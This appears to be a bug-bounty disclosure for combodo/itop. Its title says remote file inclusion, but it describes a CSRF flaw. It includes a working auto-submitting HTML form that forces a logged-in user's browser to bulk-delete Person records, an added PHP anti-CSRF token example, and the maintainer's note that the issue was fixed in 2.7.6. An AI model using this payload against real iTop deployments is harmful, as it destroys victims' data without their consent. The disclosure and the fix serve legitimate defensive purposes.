PHP Remote File Inclusion in combodo/itop

Valid

Reported on Nov 24th 2021


Description

CSRF bug

Proof of Concept

The request below is vulnerable to a CSRF attack:

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8008/web/pages/UI.php" method="POST">
<input type="hidden" name="transaction&#95;id" value="adm238C&#46;tmp" />
<input type="hidden" name="operation" value="bulk&#95;delete&#95;confirmed" />
<input type="hidden" name="filter" value="&#37;5B&#37;22SELECT&#43;&#37;60Person&#37;60&#43;FROM&#43;Person&#43;AS&#43;&#37;60Person&#37;60&#43;WHERE&#43;&#37;28&#37;60Person&#37;60&#46;&#37;60id&#37;60&#43;IN&#43;&#37;28&#37;2715&#37;27&#37;2C&#43;&#37;2712&#37;27&#37;2C&#43;&#37;2716&#37;27&#37;2C&#43;&#37;2717&#37;27&#37;2C&#43;&#37;276&#37;27&#37;2C&#43;&#37;2722&#37;27&#37;2C&#43;&#37;275&#37;27&#37;2C&#43;&#37;2724&#37;27&#37;2C&#43;&#37;278&#37;27&#37;2C&#43;&#37;2723&#37;27&#37;2C&#43;&#37;2727&#37;27&#37;2C&#43;&#37;2710&#37;27&#37;2C&#43;&#37;2711&#37;27&#37;2C&#43;&#37;2726&#37;27&#37;2C&#43;&#37;274&#37;27&#37;2C&#43;&#37;2714&#37;27&#37;2C&#43;&#37;279&#37;27&#37;2C&#43;&#37;2713&#37;27&#37;2C&#43;&#37;2728&#37;27&#37;2C&#43;&#37;271&#37;27&#37;2C&#43;&#37;272&#37;27&#37;2C&#43;&#37;2718&#37;27&#37;2C&#43;&#37;2729&#37;27&#37;2C&#43;&#37;273&#37;27&#37;2C&#43;&#37;2721&#37;27&#37;2C&#43;&#37;2719&#37;27&#37;2C&#43;&#37;2720&#37;27&#37;2C&#43;&#37;277&#37;27&#37;2C&#43;&#37;2725&#37;27&#37;29&#37;29&#37;22&#37;2C&#37;5B&#37;5D&#37;2C&#37;5B&#37;5D&#37;5D" />
<input type="hidden" name="class" value="Person" />
<input type="hidden" name="selectObject&#91;&#93;" value="15" />
<input type="hidden" name="selectObject&#91;&#93;" value="12" />
<input type="hidden" name="selectObject&#91;&#93;" value="16" />
<input type="hidden" name="selectObject&#91;&#93;" value="17" />
<input type="hidden" name="selectObject&#91;&#93;" value="6" />
<input type="hidden" name="selectObject&#91;&#93;" value="22" />
<input type="hidden" name="selectObject&#91;&#93;" value="5" />
<input type="hidden" name="selectObject&#91;&#93;" value="24" />
<input type="hidden" name="selectObject&#91;&#93;" value="8" />
<input type="hidden" name="selectObject&#91;&#93;" value="23" />
<input type="hidden" name="selectObject&#91;&#93;" value="27" />
<input type="hidden" name="selectObject&#91;&#93;" value="10" />
<input type="hidden" name="selectObject&#91;&#93;" value="11" />
<input type="hidden" name="selectObject&#91;&#93;" value="26" />
<input type="hidden" name="selectObject&#91;&#93;" value="4" />
<input type="hidden" name="selectObject&#91;&#93;" value="14" />
<input type="hidden" name="selectObject&#91;&#93;" value="9" />
<input type="hidden" name="selectObject&#91;&#93;" value="13" />
<input type="hidden" name="selectObject&#91;&#93;" value="28" />
<input type="hidden" name="selectObject&#91;&#93;" value="1" />
<input type="hidden" name="selectObject&#91;&#93;" value="2" />
<input type="hidden" name="selectObject&#91;&#93;" value="18" />
<input type="hidden" name="selectObject&#91;&#93;" value="29" />
<input type="hidden" name="selectObject&#91;&#93;" value="3" />
<input type="hidden" name="selectObject&#91;&#93;" value="21" />
<input type="hidden" name="selectObject&#91;&#93;" value="19" />
<input type="hidden" name="selectObject&#91;&#93;" value="20" />
<input type="hidden" name="selectObject&#91;&#93;" value="7" />
<input type="hidden" name="selectObject&#91;&#93;" value="25" />
<input type="hidden" name="c&#91;menu&#93;" value="Contact" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
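The PoC submits a fixed transaction_id value alongside operation=bulk_delete_confirmed, so the request succeeds without any secret the cross-site page could not know. As an added example (not iTop's code; it assumes a plain-array session and hypothetical function names, with the parameter names taken from the PoC), a PHP handler that issues an unpredictable, single-use, session-bound transaction id and refuses the bulk delete without it:

```php
<?php
// Added example, not iTop's code: anti-CSRF transaction id for a state-changing
// POST such as operation=bulk_delete_confirmed. Assumptions: the session is a
// plain array and the function names are hypothetical; parameter names follow the PoC.
// Issue a single-use, unpredictable transaction id and record it in the session.
function issue_transaction_id(array &$session): string
{
    $token = bin2hex(random_bytes(32));           // 256 CSPRNG bits, not a temp-file name
    $session['transaction_ids'][$token] = time();  // issue time lets stale ids expire
    return $token;
}

// Validate and consume the id echoed back by the form; anything unknown is refused.
function is_transaction_valid(array &$session, ?string $submitted, int $maxAge = 3600): bool
{
    if ($submitted === null || empty($session['transaction_ids'])) {
        return false;
    }
    foreach ($session['transaction_ids'] as $stored => $issuedAt) {
        if (hash_equals((string) $stored, $submitted)) {   // constant-time comparison
            unset($session['transaction_ids'][$stored]);   // single use
            return (time() - $issuedAt) <= $maxAge;
        }
    }
    return false;
}

// Bulk-delete confirmation handler: deletion proceeds only when the POST carries
// a transaction_id that this very session issued.
function handle_bulk_delete(array &$session, array $post): string
{
    if (($post['operation'] ?? '') !== 'bulk_delete_confirmed') {
        return 'ignored: not a bulk delete';
    }
    if (!is_transaction_valid($session, $post['transaction_id'] ?? null)) {
        return 'rejected: missing, unknown or reused transaction_id';
    }
    $ids = array_map('intval', (array) ($post['selectObject'] ?? []));
    return 'deleted ' . count($ids) . ' ' . ($post['class'] ?? '?') . ' objects';
}

// Demo: a cross-site form can only send guessable values (as in the PoC),
// while a form rendered by the application carries an id the session knows.
$session = [];
$forged = ['operation' => 'bulk_delete_confirmed', 'transaction_id' => 'adm238C.tmp', 'class' => 'Person', 'selectObject' => ['15', '12']];
echo handle_bulk_delete($session, $forged), "\n";
$genuine = $forged;
$genuine['transaction_id'] = issue_transaction_id($session);
echo handle_bulk_delete($session, $genuine), "\n";
echo handle_bulk_delete($session, $genuine), "\n";   // second submit: id already consumed
```

A SameSite=Lax or Strict session cookie and a check of the Origin header are complementary defences; the per-session token remains the one that ties the confirmation to a form the application itself rendered.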
ranjit-git modified the report 2 years ago
combodo/itop maintainer validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Pierre Goiffon (Maintainer), 3 months ago:


This is a duplicate of https://huntr.dev/bounties/0a39630d-f4b9-4468-86d8-aea3b02f91ae/?token=4d1195d5a50a9f0f7ae9fc24a2b0a3bd907427edaf7ee6ac1f8f31c11d8b7a5d2c204957125e63fd7cf3a87df6d5d12a35f9c7107ba5f33b5f668fa199a36932448b9bf186daa62cb32b5635770730eb68eeeba079b8864ab00358fd0dc65fa406d986525814a14951db2025e117f0098a1f270f5a5b2c935a65b00b5106e5511b61d501c4357654cb8ea76b

Was fixed in 2.7.6 / N°4289. Corresponding GitHub advisory: https://github.com/Combodo/iTop/security/advisories/GHSA-33pr-5776-9jqf

Pierre Goiffon marked this as fixed in 2.7.6 with commit 7757f1 3 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Pierre Goiffon published this vulnerability 3 months ago